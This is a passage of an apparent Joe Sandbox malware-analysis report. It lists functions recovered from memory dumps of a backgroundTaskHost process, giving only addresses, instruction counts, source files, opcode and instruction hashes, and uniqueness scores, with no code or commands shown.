              • Instruction ID: d4684026e79b8b8c3efb5df8f6d2aa6879fcf6d42ef45b832a298068b5e91f3b
              • Opcode Fuzzy Hash: f187983f99419f13e89631ac99c0e346a653e7068982e93895cc3d97560972c3
              • Instruction Fuzzy Hash: 4311C2B0C1965D8FDB49DB34C8581BD3BF0FF15300F4004BAD919C6192EA36A918C750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF573E1 Relevance: .1, Instructions: 52COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 46f11ca0b6f2b1a31752348ba1d37484fcd19fb64486b93cc66259e7df84bbdf
              • Instruction ID: acb212e3fe7fc7d4a35dabb31c6d2461e3fce8ab5a6c03062df58a1b1ecfad7a
              • Opcode Fuzzy Hash: 46f11ca0b6f2b1a31752348ba1d37484fcd19fb64486b93cc66259e7df84bbdf
              • Instruction Fuzzy Hash: 4301B1B0819A4ECFDB59DB74C5991B93FA0EF54300F4004BBD90AC6192DE36A954C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF405F1 Relevance: .1, Instructions: 51COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 702d04b55df569c88f098190d3491a5570c5095297b885d7b2048278f0ee0567
              • Instruction ID: 1bf184c8dcdc90a9c178252ecdb0d112db04afb05389795dce24a8f8150e0a74
              • Opcode Fuzzy Hash: 702d04b55df569c88f098190d3491a5570c5095297b885d7b2048278f0ee0567
              • Instruction Fuzzy Hash: 7E01B1F191960E4FE792EB78C58D1A97BF0FF98300F4105B5D80AC3092DE38E448CA50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF401D0 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2ba458a2df8bbd35088afaf9c1b54310743ea4dc340e15553478895f27efd777
              • Instruction ID: 57b5eed980ebe5fcdf7b473a8df8678a5d2a280839aaeee70379457e4037d81a
              • Opcode Fuzzy Hash: 2ba458a2df8bbd35088afaf9c1b54310743ea4dc340e15553478895f27efd777
              • Instruction Fuzzy Hash: 5C019EB094990E8FEF89EF38C4896BA77A1FF58304F50847EE80EC2191CE32A555CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF56C59 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a79e8aa3e96b1e62fe4ea384aa763ea7ecd0b9b7462eef7954555dc16b1208c9
              • Instruction ID: ed3fb71edac40b3b82136e75c1d8fa02aac9cc9f5839f91ed474c25d99f294c5
              • Opcode Fuzzy Hash: a79e8aa3e96b1e62fe4ea384aa763ea7ecd0b9b7462eef7954555dc16b1208c9
              • Instruction Fuzzy Hash: 7401F7B490D64E5FE752EB78CC5D1A93FE0EF4A301F4504B2D518C71A2DE24E848C750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42DD9 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 39646d106ca9a165394084a40819815117eb04e79b0b18d1f7a68bb75be52276
              • Instruction ID: 94764dd65ce63571b6a56c0f73f75f9ba7007be0405e04e2344f76de30b3c7aa
              • Opcode Fuzzy Hash: 39646d106ca9a165394084a40819815117eb04e79b0b18d1f7a68bb75be52276
              • Instruction Fuzzy Hash: B7018FB581E6494FE752EB34C99D5E93FE0EF5A300F0509B7D808CB0A2EA29E458C711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5745D Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b974b3e307bbe9f888f65fc5a42ef9e925bddc191cc05a7ed836c7fe93db0006
              • Instruction ID: e62ff1d45e2b6544768b6b2c716735fce5d2a60e35bd15d336b35d86b82cbb8a
              • Opcode Fuzzy Hash: b974b3e307bbe9f888f65fc5a42ef9e925bddc191cc05a7ed836c7fe93db0006
              • Instruction Fuzzy Hash: 79015EB0819A4ECFDB59EB74C5591BA7FA0FF55300F1004BED90AC6192DA76A944C750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF520F0 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f47615e2351697f4f40c75ed8353ac056546b9a83aeefc69d48b71822df08d09
              • Instruction ID: 9504870c8203879ffe8a67466cdd4847fdda70c3d199595caf0191879379d814
              • Opcode Fuzzy Hash: f47615e2351697f4f40c75ed8353ac056546b9a83aeefc69d48b71822df08d09
              • Instruction Fuzzy Hash: 3901D6E2D1D54E4AE791AB78DC1D1FA3EE0EF14301F0506B6DB48C2092DA36E9488680
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4745C Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468329401.00007FFBACF45000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF45000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf45000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d969abd9b04307c15bd8bac2b0c10dad8f1e8961f498019bf31c064372f8578d
              • Instruction ID: d248376db320db2b3412f3c1dbce65dd0cc1b7265975c4cbddcaabd84cdad659
              • Opcode Fuzzy Hash: d969abd9b04307c15bd8bac2b0c10dad8f1e8961f498019bf31c064372f8578d
              • Instruction Fuzzy Hash: 2411FAB4D0962A8FDBA5DB28C984BE9B3F4EB58301F1041E6D40DA2245DB399AC9CF44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4332A Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 36d84858cc16ae20c055d26c349b4ed8c82bf2c9ca9e6470ca81a59e2d01d36d
              • Instruction ID: b84d7216a62ab1cd75ab480d9d542aa5c87e4047cfd029ff94d78de20b04793f
              • Opcode Fuzzy Hash: 36d84858cc16ae20c055d26c349b4ed8c82bf2c9ca9e6470ca81a59e2d01d36d
              • Instruction Fuzzy Hash: 17012CB0D2851E9EEB91EB78C58C1B97AE5FF58301F644976E818C2161EE35E1488740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF408EF Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3f2ae653b32d15a3054d6f45f8217eccd207e6ba7cb68aa0796a1bc910361f86
              • Instruction ID: 2abcb2a3a5e4501a605189da73635ef168534411c6d326fcefa28dcdad1fbf56
              • Opcode Fuzzy Hash: 3f2ae653b32d15a3054d6f45f8217eccd207e6ba7cb68aa0796a1bc910361f86
              • Instruction Fuzzy Hash: 8F0121B2C0890D4EEF49EB34C48AAE9B7A1FF58310F0541B5C44AD7193CE34B88A8B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40200 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0aa30b00e9ac1ecc8ae2ae355f40c5346133c7d04913c4e72c79249570173e1e
              • Instruction ID: eaab0922fb5b3b175df4cbcbeff4f2a39b5621cf0f57ea6f86297daadc75d027
              • Opcode Fuzzy Hash: 0aa30b00e9ac1ecc8ae2ae355f40c5346133c7d04913c4e72c79249570173e1e
              • Instruction Fuzzy Hash: 340169B4819A0E8AEB59EB74C4982BD77A0FF58305F50087EE80EC6192DF36A595CA10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40208 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ece4dacdfa7048a372160d475295a1b42a99e368230740824098bd8d66e06963
              • Instruction ID: d1372edf4c089a391c6a8e95af857113ae914a7802ace1799fe091eeae9e710b
              • Opcode Fuzzy Hash: ece4dacdfa7048a372160d475295a1b42a99e368230740824098bd8d66e06963
              • Instruction Fuzzy Hash: E0018CB4819A1E8FEB59EF74C49D2BA77A0FF18304F50087EE80EC2191DF36A158CA10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF417BD Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 62cb887066b472371f5332ec8db87fd39afd260c2b1000182e9732ce17cfba6f
              • Instruction ID: af22ef4cb25f0e11bae35cd3ff1fab67512e68c43b0a9523ba52da82ab42f0bd
              • Opcode Fuzzy Hash: 62cb887066b472371f5332ec8db87fd39afd260c2b1000182e9732ce17cfba6f
              • Instruction Fuzzy Hash: 5001D1B088968D8FDF95DF38C4992FA3BE0FF55301F8040BAE808C2092DA76D854C780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40D20 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a755d3f066fe7d7f20889dc2f4d11dcded874e28df1f5c8ada42dfcdf4a28edc
              • Instruction ID: befc673ad9c6f3be83c681535a5e912d588a5b46d19ab5abc37ac0004c830a0d
              • Opcode Fuzzy Hash: a755d3f066fe7d7f20889dc2f4d11dcded874e28df1f5c8ada42dfcdf4a28edc
              • Instruction Fuzzy Hash: 8CF0FFB1C2954E8AEBA6AA78E88C3FDBBB0FB15314F00157AD80DC1481CF76619C8241
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF520F8 Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c44c42cbef17f044d33a116d7137f8655c1d91f4f6d0186947a5a295f380c8d7
              • Instruction ID: f1fb1cc3bd325bf712178bdf3ebed5309257d847a5954f435b8d4560cb84ba94
              • Opcode Fuzzy Hash: c44c42cbef17f044d33a116d7137f8655c1d91f4f6d0186947a5a295f380c8d7
              • Instruction Fuzzy Hash: 78F0C8F1C1D54E4AE791AB78C85D1FA3EE0FF14300F0106B6DB4CC2092EB35D9488640
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF401C8 Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 33f31f8832e434362f0d647f82cd7396bdb21fee14eef7e8c11f379fde3c8a24
              • Instruction ID: a65ed04a7793ec241076e3a2aea99a2e47fb8b55e02297bbeaea96e76912936b
              • Opcode Fuzzy Hash: 33f31f8832e434362f0d647f82cd7396bdb21fee14eef7e8c11f379fde3c8a24
              • Instruction Fuzzy Hash: ACF0AFB088950E8FEF95EF38D4892FA37A4EF55304F40443AE80DC2081DA36E494CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF56D93 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f04e9c30c860dd751830a5a4a01a0ed7674df398e41215c312ee2f75ede2c065
              • Instruction ID: 83592e7f86a0650db5f8b9e08109296e513550d5f4b698ba55e55573ef242ccb
              • Opcode Fuzzy Hash: f04e9c30c860dd751830a5a4a01a0ed7674df398e41215c312ee2f75ede2c065
              • Instruction Fuzzy Hash: 36012CB5D0921ACFDF15CEA0D8856FC77B0AF19321F14063AD416A22C0CA396988CB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF426CD Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468221599.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf40000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 22f94ecb9ea6dde58dccc8b351f08548c3734e544b52d7d232985c7db37c858b
              • Instruction ID: 0cf026b48649fa2e03fef3d8eb9c3d82c19b4bc5fe5c4757eba8c55c5646c0b2
              • Opcode Fuzzy Hash: 22f94ecb9ea6dde58dccc8b351f08548c3734e544b52d7d232985c7db37c858b
              • Instruction Fuzzy Hash: 27F0F6B481A38E4FE76A9F34C8592B93BA0FF05300F4004BAE809C50D2EF799458C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF50580 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7a4ff7a3a0408ea2f7c17bdf209461cfd9b5f87e7edc05d34db592fcdc6ceff5
              • Instruction ID: 47e778152f6a3cd0065a54a0373a79211cb29cceb8d61f174849371058dea3d9
              • Opcode Fuzzy Hash: 7a4ff7a3a0408ea2f7c17bdf209461cfd9b5f87e7edc05d34db592fcdc6ceff5
              • Instruction Fuzzy Hash: 27F03AB091595E9EEB95EF78C8096BE76E0FF18301F40093AE819C2190DB3495548B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF570A4 Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: af0bccea9ec9adc73415aa6d6be106ad1e6ee282675e3c18c58756ae818e1335
              • Instruction ID: f14527afc493e0e493379e56d61c30db3a194eda6e305332fd9b5ba685842543
              • Opcode Fuzzy Hash: af0bccea9ec9adc73415aa6d6be106ad1e6ee282675e3c18c58756ae818e1335
              • Instruction Fuzzy Hash: 2EF058B6E0845D8BEF14EBA8D8814FCB7F1EF98310F50003AD109E7282CA28AD05CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF481D5 Relevance: .0, Instructions: 30COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468329401.00007FFBACF45000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF45000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf45000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1e8c057e5b32a232bc6f68c7f1b5e46f897a5ea0886033c344f392469eafb464
              • Instruction ID: 99d3f7f1d7eaa285705663bc19bca2d5bcd71f2146cc872836932b80a7be2548
              • Opcode Fuzzy Hash: 1e8c057e5b32a232bc6f68c7f1b5e46f897a5ea0886033c344f392469eafb464
              • Instruction Fuzzy Hash: B2F0AFF4D0965A8FDBA6DB28C984BF977F4AB18301F1001E5950D92241DB399BC99F44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46E0B Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468329401.00007FFBACF45000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF45000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf45000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9f863f6f4c24272adc0935212cf425144983779230bf105232f84f2ab08d073e
              • Instruction ID: cbc743d61b3abc16daa3ae51547ec30bfe050070eb389db9d91fa395479d47f1
              • Opcode Fuzzy Hash: 9f863f6f4c24272adc0935212cf425144983779230bf105232f84f2ab08d073e
              • Instruction Fuzzy Hash: 27F0FEF0D0961A8FDBA5DB28C984BE9B7F4EB18300F1001E5950DD3242DA349BC58F44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF53401 Relevance: .0, Instructions: 23COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.468550525.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffbacf50000_backgroundTaskHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa42e9b19796a7e08efdeeb0a433f3b55ff914da6d000e83b800b2528b8fe5b4
              • Instruction ID: 6c951e7511b68ff4d3282e768bb14ac989c1999dfb6beaa274e5196c59c1734a
              • Opcode Fuzzy Hash: aa42e9b19796a7e08efdeeb0a433f3b55ff914da6d000e83b800b2528b8fe5b4
              • Instruction Fuzzy Hash: C6E0C270849A0C6BCB11AF69E80829873B5FB49304F000639E80CD7041D7369D98C700
              Uniqueness

              Uniqueness Score: -1.00%